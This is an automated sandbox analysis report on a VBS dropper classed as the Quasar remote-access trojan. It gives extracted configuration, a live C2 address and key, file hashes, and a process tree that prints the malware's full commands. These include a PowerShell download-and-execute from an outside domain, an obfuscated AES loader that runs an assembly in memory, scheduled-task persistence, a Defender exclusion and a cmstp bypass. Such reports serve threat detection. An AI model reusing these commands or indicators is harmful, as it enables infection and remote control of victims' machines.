Overview

overview

10

Static

static

1

9273_output.vbs

windows7-x64

8

9273_output.vbs

windows10-2004-x64

10

9273_output.vbs

windows10-ltsc 2021-x64

10

9273_output.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    98s
  • max time network
    142s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    09-12-2024 17:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Score
10/10
quasarsearchindexerexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

searchindexer

C2

87.120.113.125:55644

Mutex

0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes
  • encryption_key

    54717FCDBD30C7781F669403FBC8E35733C37E34

  • install_name

    searchindexer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    searchindexer

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3316
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA45.tmp" "c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\CSC18256470C90B4AC3BB484DC7ABDEC31.TMP"
            5⤵
              PID:1444
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\rnwlqawr.inf
            4⤵
              PID:696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_672_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx672.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3216
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx672.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:748
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx672.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx672.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3436
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3008
                  • C:\Program Files\SubDir\searchindexer.exe
                    "C:\Program Files\SubDir\searchindexer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:396
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5068

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\SubDir\searchindexer.exe
        Filesize

        445KB

        MD5

        2e5a8590cf6848968fc23de3fa1e25f1

        SHA1

        801262e122db6a2e758962896f260b55bbd0136a

        SHA256

        9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

        SHA512

        5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        3eb3833f769dd890afc295b977eab4b4

        SHA1

        e857649b037939602c72ad003e5d3698695f436f

        SHA256

        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

        SHA512

        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        129b0eae051e116c39b4a49f152aca98

        SHA1

        a8ee88da2dd6724280dcba08760f311589c25cdd

        SHA256

        f510fc496a4bdb4e8045d66b81620156d51c17b33f6499472c00ac72abcf73ff

        SHA512

        62d480dee86e7a08487afdaba6bef104518fd9ba9ecbcbeb0efab87ac09d7e73aed40b84c40b4d602bf758a895eca6acd6b9dae748ca5010942f93a48f383a3a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        6d83099e264e991784509db37bef50fb

        SHA1

        4e6ae1b6529b3f45a898e1d752e0dde880322f2c

        SHA256

        098d22dfe0fba00c551f8d68a5154051291faa5c9441ba805ce2a831ca561b8a

        SHA512

        dd6cb9dc49c9bdaf7e4ba13008199ae04a0de4dae5a2f4eb8ae5fda5983fdf95740f7c04af26750c51fb85ce37d5398eddda818e6eaad8a512d3ffe136a1dc26

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESCA45.tmp
        Filesize

        1KB

        MD5

        0e96b130c831f4511e83c2f61540a558

        SHA1

        96a28cb8407d98481848c65122bcf205c66e1495

        SHA256

        24527286a6968ebb4f9b5ab2336238084a756e4f5a88c26679358ad125ea19ee

        SHA512

        172a992528052eb5585ff4d4df45366d8a241ba75203ef13a363425c41eb4e45d9a0983551a86a5e90c82afec7aebfbdcc4db25f8b5add3d23a5a4c734ce2218

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dz1umvwj.rv5.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.dll
        Filesize

        4KB

        MD5

        3f729706890ba9ebaa093e6799dadeaa

        SHA1

        148ebf91084662ccf858bcd181a9d6d8ddbd6ac1

        SHA256

        c4e279e3babfe2e8f4734df5b8d1c5acb40ec95f99c4ae31ae2752d2a0b8f971

        SHA512

        d303f02988991a323a15d7e217c7be362dbf1c85c67252669716c3709279fe2d0a2b2d57b9c7e23c4e8383776d0ab86957a83d75bf8adb9b3889b88e52c9d274

        Download Submit

      • C:\Users\Admin\AppData\Roaming\latencyx672.vbs
        Filesize

        111B

        MD5

        26b968453e7c562512ecc1b493bd6386

        SHA1

        c2497d82f2e54a4cb4e053d470ae500548dcf1f4

        SHA256

        43b6df2055715721417038c807155be21b071252bea49a6b3781730909d1b936

        SHA512

        a2d92e0f27edf6f118215a9e72683c0d5453bdd2ecdcc2ce8616de79b122d3efb0e16782c8b2339fdceff49f6bdc0b518d964c038257a9a7da92cf84fc3fd5da

        Download Submit

      • C:\windows\temp\rnwlqawr.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\CSC18256470C90B4AC3BB484DC7ABDEC31.TMP
        Filesize

        652B

        MD5

        fa0287dc2c69619b392cf261f7eeb2c2

        SHA1

        98881ff26b455306c49d20404dcdef25612beef0

        SHA256

        bebfc4a1e27ba3fdf4d895281f3b08b162790bf76ea87bfa53116a8ee25c80b8

        SHA512

        5a78e2e5cdd6ab4de5578294acc8ebb2ab39e20113e7f19d9f3c340577631a0d441b24ffdbf5d73001a376ffd15351ffcbc1518e5d718705bf34f87bd6ea98bc

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.cmdline
        Filesize

        369B

        MD5

        48c9ca7bdbb853dd50cbdb50b801701e

        SHA1

        ec1df40d23f113758f3712a1a06c510daa9a3635

        SHA256

        34549750612eb62a99088da6091655149ac6edec8282dc7086b9203f9338e5a3

        SHA512

        3d61ba319b65767f039d8a4610f9b8d6b94bd51bf0fd67fb918599e958228272a64c5d9d10ba5a7e244bf09f58fce37637d005489ecc69b45a01909b01bfac5b

        Download Submit

      • memory/2844-110-0x000001C6732D0000-0x000001C673314000-memory.dmp

        Filesize

        272KB

        Download

      • memory/2844-111-0x000001C673320000-0x000001C673396000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3316-44-0x00007FFC93643000-0x00007FFC93645000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3316-45-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3316-0-0x00007FFC93643000-0x00007FFC93645000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3316-49-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3316-27-0x0000021361590000-0x0000021361598000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3316-14-0x0000021361560000-0x000002136157C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/3316-13-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3316-12-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3316-11-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3316-1-0x00000213611D0000-0x00000213611F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3436-98-0x00000223B3EC0000-0x00000223B41E4000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/5032-67-0x000001F6343A0000-0x000001F6343A8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/5032-68-0x000001F636AA0000-0x000001F636BD2000-memory.dmp

        Filesize

        1.2MB

        Download